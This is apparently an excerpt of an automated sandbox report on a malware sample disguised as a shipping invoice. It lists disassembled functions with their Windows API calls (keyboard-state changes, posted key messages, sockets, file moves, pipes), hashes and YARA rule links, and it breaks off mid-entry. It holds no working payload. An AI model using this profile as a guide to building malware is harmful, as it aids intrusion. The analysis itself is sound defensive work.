Instruction ID: 1805a0cc69fbbb964e15b8a736a655253a014d7244d3b62ceb63d91bf63e25d0
Opcode Fuzzy Hash: 8d4e3de8c2f1fbb50e88d52abeb75c2742586b86a19a2b679d60c6708a1c4693
Instruction Fuzzy Hash: 2A719075A00215AFCF10DF65C981AAEBBF1EF48314F1484BAE816EB341D778ED418B95

Function 0046AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0046AEF9
GetKeyboardState.USER32(?), ref: 0046AF0E
SetKeyboardState.USER32(?), ref: 0046AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0046AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0046AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0046AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0046B020

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8ba9329f5e92e9aafe7d6210d21796c70848bd923dbcc46e916c1a158f3e09e2
Instruction ID: 9924b26ac272194e3fc2510f454a83dab54fe79ae351ef58dbb63b9bc59f5407
Opcode Fuzzy Hash: 8ba9329f5e92e9aafe7d6210d21796c70848bd923dbcc46e916c1a158f3e09e2
Instruction Fuzzy Hash: 7B51C3A0A047D53DFB3682348845BBB7EE99B06304F08848AE1D5955C3E3ADACD4D79B

Function 0046ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0046AD19
GetKeyboardState.USER32(?), ref: 0046AD2E
SetKeyboardState.USER32(?), ref: 0046AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0046ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0046ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0046AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0046AE38

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: a843fa4b37df1311c615547b8d4ddbcfaa844942cebff1219c35041fbe4f6eb7
Instruction ID: e772fa98876e3abb59c89613fc69063f5804bceb421966d291ff7e32e81c25bc
Opcode Fuzzy Hash: a843fa4b37df1311c615547b8d4ddbcfaa844942cebff1219c35041fbe4f6eb7
Instruction Fuzzy Hash: EF5108A0644BD13DFB328334CC95B7B7ED95B05300F08848AE1D5659C2E399ECA4DB5B

Function 0043542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00443CD6,?,?,?,?,?,?,?,?,00435BA3,?,?,00443CD6,?,?), ref: 00435470
__fassign.LIBCMT ref: 004354EB
__fassign.LIBCMT ref: 00435506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00443CD6,00000005,00000000,00000000), ref: 0043552C
WriteFile.KERNEL32(?,00443CD6,00000000,00435BA3,00000000,?,?,?,?,?,?,?,?,?,00435BA3,?), ref: 0043554B
WriteFile.KERNEL32(?,?,00000001,00435BA3,00000000,?,?,?,?,?,?,?,?,?,00435BA3,?), ref: 00435584

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 7850a60d81c923c6729269c404aade9b900cc1d094dee1c2b49cd7d090460185
Instruction ID: 03b2d8e156cb616675dc9e509242e86edbd9154058664cc16284d0fe897106b2
Opcode Fuzzy Hash: 7850a60d81c923c6729269c404aade9b900cc1d094dee1c2b49cd7d090460185
Instruction Fuzzy Hash: 4A51C570900649AFDB10CFA8D885AEEBBF9EF0D300F14552BF955E7291D734AA41CB68

Function 004810B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0048304E: inet_addr.WSOCK32(?), ref: 0048307A
Part of subcall function 0048304E: _wcslen.LIBCMT ref: 0048309B

socket.WSOCK32(00000002,00000001,00000006), ref: 00481112
WSAGetLastError.WSOCK32 ref: 00481121
WSAGetLastError.WSOCK32 ref: 004811C9
closesocket.WSOCK32(00000000), ref: 004811F9

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: dbd23f55031ac0a013bbd3399b20094ebf9ac1a4033711b01e9060edf7a4063a
Instruction ID: 705474394c914199550c23bc0cacf20d47ff7b262d5d4d6d2dda95f8d1e63c40
Opcode Fuzzy Hash: dbd23f55031ac0a013bbd3399b20094ebf9ac1a4033711b01e9060edf7a4063a
Instruction Fuzzy Hash: 4241C831600104AFD710AF54C888BAEB7E9EF45358F14856BF9159B2E1C778AD42CBE9

Function 0046CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0046DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0046CF22,?), ref: 0046DDFD

Part of subcall function 0046DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0046CF22,?), ref: 0046DE16

lstrcmpiW.KERNEL32(?,?), ref: 0046CF45
MoveFileW.KERNEL32(?,?), ref: 0046CF7F
_wcslen.LIBCMT ref: 0046D005
_wcslen.LIBCMT ref: 0046D01B
SHFileOperationW.SHELL32(?), ref: 0046D061

Strings

\*.*, xrefs: 0046CFF3

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 46f710d8293719b9c6cfa25800096bd3e801fa08a52bb9c5e2e18d91c6c6bf5f
Instruction ID: 30fb1ba172d36164f734a964d5767b00f9f23bd7893fd7b2338ade8b969c747b
Opcode Fuzzy Hash: 46f710d8293719b9c6cfa25800096bd3e801fa08a52bb9c5e2e18d91c6c6bf5f
Instruction Fuzzy Hash: 7F416771D051189FDF16EBA5D981AEEB7B8AF08384F0000EBE545E7141FA38A684CB59

Function 00492DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00492E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00492E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00492E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00492EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00492EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00492EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00492F0B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: fe423517453c25fbcdae921af8a04fbdf3df099c7ed61434985df7eec3b91bed
Instruction ID: 89252755f0c39dde2eed47c772f1032802557b1e9df75e8823ace49cd181d258
Opcode Fuzzy Hash: fe423517453c25fbcdae921af8a04fbdf3df099c7ed61434985df7eec3b91bed
Instruction Fuzzy Hash: AF310035605250AFEF21CF18DED4F663BA0EB9A710F1501B6F9048B2B2CBA5AC40DB59

Function 00467726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00467769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0046778F
SysAllocString.OLEAUT32(00000000), ref: 00467792
SysAllocString.OLEAUT32(?), ref: 004677B0
SysFreeString.OLEAUT32(?), ref: 004677B9
StringFromGUID2.OLE32(?,?,00000028), ref: 004677DE
SysAllocString.OLEAUT32(?), ref: 004677EC

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a6c9bd8fc0098c0aa2ac031152d4c288d08c39061c019954cd450baa0328975b
Instruction ID: 1347edb73164e8fdaf58e89a1e73af5f76d8f2b3629143057cc2d6e93ba64612
Opcode Fuzzy Hash: a6c9bd8fc0098c0aa2ac031152d4c288d08c39061c019954cd450baa0328975b
Instruction Fuzzy Hash: 1121C476604219AFDF10DFA8CD88CBB77ACEB093697048037F904DB250E678EC418B69

Function 004677FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00467842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00467868
SysAllocString.OLEAUT32(00000000), ref: 0046786B
SysAllocString.OLEAUT32 ref: 0046788C
SysFreeString.OLEAUT32 ref: 00467895
StringFromGUID2.OLE32(?,?,00000028), ref: 004678AF
SysAllocString.OLEAUT32(?), ref: 004678BD

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 707ae9666ae7516db46652daa0f733c5e2dfba58e96e26974dc6f4f3f5fdd8d4
Instruction ID: 65347bf14241952f6fe516d953df497e863d0a2c9858df12de4266c5492117f8
Opcode Fuzzy Hash: 707ae9666ae7516db46652daa0f733c5e2dfba58e96e26974dc6f4f3f5fdd8d4
Instruction Fuzzy Hash: E4217471608204AFDB10AFB8DC88DAB77ECEB097647108136F915CB2A1E674DC85CB6D

Function 004704D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 004704F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0047052E

Strings

nul, xrefs: 00470567

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 6a902a1a203d2ba6554c9156c2122f106e0b0ece3aef374871c2a7a7205a7d7c
Instruction ID: 37ebc47a503473eab46a6a662aa34668f64f5ef64e3e21c44b32a32161578eff
Opcode Fuzzy Hash: 6a902a1a203d2ba6554c9156c2122f106e0b0ece3aef374871c2a7a7205a7d7c
Instruction Fuzzy Hash: 58216D75501305EBDB20DF29DC45ADA7BA8AF54724F208A2AF8A9D62E0D7749940CF28

Function 004705A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 004705C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00470601

Strings

nul, xrefs: 00470639

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 7a4e311930e80124f8ce9cad65942f1111aa2e8cf77577d7e27b56d82681dd65
Instruction ID: d6020922c6df84973a4937718467039e5c324196057f4af472b7a3e10f2118b5
Opcode Fuzzy Hash: 7a4e311930e80124f8ce9cad65942f1111aa2e8cf77577d7e27b56d82681dd65
Instruction Fuzzy Hash: 3521D375501301DBDB208F698C54ADB77E8AF91724F208A2BF8A5E33D0D7749860CB28

Function 004940AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0040600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040604C
Part of subcall function 0040600E: GetStockObject.GDI32(00000011), ref: 00406060
Part of subcall function 0040600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0040606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00494112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0049411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0049412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00494139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00494145

Strings

Msctls_Progress32, xrefs: 004940E3

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: c50fb4c64ff722785e59701b13b36032d6ebc45d8e81b9d85d95dbe7338d2343
Instruction ID: 7e299372ae2737e93466ee5066a8a0b4e73a7db95b0c4324f016d70e89fb52b2
Opcode Fuzzy Hash: c50fb4c64ff722785e59701b13b36032d6ebc45d8e81b9d85d95dbe7338d2343
Instruction Fuzzy Hash: 4C11B6B21401197EEF119F64CC86EE77F5DEF08798F014121BA18A2150C7769C21DBA8

Function 0043D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043D7A3: _free.LIBCMT ref: 0043D7CC

_free.LIBCMT ref: 0043D82D

Part of subcall function 004329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0043D7D1,00000000,00000000,00000000,00000000,?,0043D7F8,00000000,00000007,00000000,?,0043DBF5,00000000), ref: 004329DE
Part of subcall function 004329C8: GetLastError.KERNEL32(00000000,?,0043D7D1,00000000,00000000,00000000,00000000,?,0043D7F8,00000000,00000007,00000000,?,0043DBF5,00000000,00000000), ref: 004329F0

_free.LIBCMT ref: 0043D838
_free.LIBCMT ref: 0043D843
_free.LIBCMT ref: 0043D897
_free.LIBCMT ref: 0043D8A2
_free.LIBCMT ref: 0043D8AD
_free.LIBCMT ref: 0043D8B8

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: 9628da1ed74816b1ddcfb1054e77e28d2c59f3be18865d584421ffa251c1dadf
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 1D1181B1E40B14AAD521BFB2EC07FCB7BDC6F08714F40182EB699A6292DB6CB5054654

Function 0046DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0046DA74
LoadStringW.USER32(00000000), ref: 0046DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046DA91
LoadStringW.USER32(00000000), ref: 0046DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0046DAB9

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: a664e4c0c5d0b2bfc634795dffc340d7692c6f5ea088f5bb81d31c5d349e3951
Instruction ID: cb2a43e863df41e6e3ad7029f784b5340023d8d1d8bc7ce810eda679f6cd2114
Opcode Fuzzy Hash: a664e4c0c5d0b2bfc634795dffc340d7692c6f5ea088f5bb81d31c5d349e3951
Instruction Fuzzy Hash: 39012CF69042087FEB109BA09D89EE6366CE708701F4044B7B706E2041E6749E844F79

Function 0047096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00C8DD68,00C8DD68), ref: 0047097B
EnterCriticalSection.KERNEL32(00C8DD48,00000000), ref: 0047098D
TerminateThread.KERNEL32(00540050,000001F6), ref: 0047099B
WaitForSingleObject.KERNEL32(00540050,000003E8), ref: 004709A9
CloseHandle.KERNEL32(00540050), ref: 004709B8
InterlockedExchange.KERNEL32(00C8DD68,000001F6), ref: 004709C8
LeaveCriticalSection.KERNEL32(00C8DD48), ref: 004709CF

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: c272fcceccc6d7f61d08d54095e9131f7c27ba34da8304be91edf383ae243266
Instruction ID: e7a7eacf21cf0797fa893d880d775a5ec980312bda4ea9f6b004330434e4aea7
Opcode Fuzzy Hash: c272fcceccc6d7f61d08d54095e9131f7c27ba34da8304be91edf383ae243266
Instruction Fuzzy Hash: ADF01D71442902EBD7515BA4EEC9AD67A25BF51702F801037F201508A0C775A465CFA8

Function 004301B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 004300BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004300D6
__allrem.LIBCMT ref: 004300ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043010B
__allrem.LIBCMT ref: 00430122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00430140

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 082c97b854335830c01b3ff9a8a46d3891636cb8aaeecd51a324f571a9ad5372
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 19813472B00B169BEB249A29DC51B6B73F8AF49328F64423FF550D7781E778D9008798

Function 004361FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,004282D9,004282D9,?,?,?,0043644F,00000001,00000001,8BE85006), ref: 00436258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0043644F,00000001,00000001,8BE85006,?,?,?), ref: 004362DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004363D8
__freea.LIBCMT ref: 004363E5

Part of subcall function 00433820: RtlAllocateHeap.NTDLL(00000000,?,004D1444,?,0041FDF5,?,?,0040A976,00000010,004D1440,004013FC,?,004013C6,?,00401129), ref: 00433852

__freea.LIBCMT ref: 004363EE
__freea.LIBCMT ref: 00436413

Memory Dump Source

